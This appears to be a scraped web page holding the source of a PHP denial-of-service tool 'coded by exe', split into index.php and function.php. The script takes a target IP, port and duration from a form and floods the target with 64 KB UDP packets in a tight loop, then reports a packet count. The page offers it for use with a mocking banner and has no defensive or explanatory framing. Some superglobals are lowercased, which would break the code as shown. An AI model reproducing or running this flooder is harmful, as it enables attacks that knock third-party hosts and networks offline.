index.php
$ip = $_server['remote_addr'];
?>
php dos, coded by exeyour ip: <?php echo $ip; ?> (don't dos yourself nub)
ip:
time:
port:
after initiating the dos attack, please wait while the browser loads.
function.php
//=================================================
//php dos v1.8 (possibly stronger flood strength)
//coded by exe
//=================================================
$packets = 0;
$ip = $_post['ip'];
$rand = $_post['port'];
set_time_limit(0);
ignore_user_abort(false);
$exec_time = $_post['time'];
$time = time();
print "flooded: $ip on port $rand
";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "x";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mb) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
希望与广大网友互动??
点此进行留言吧!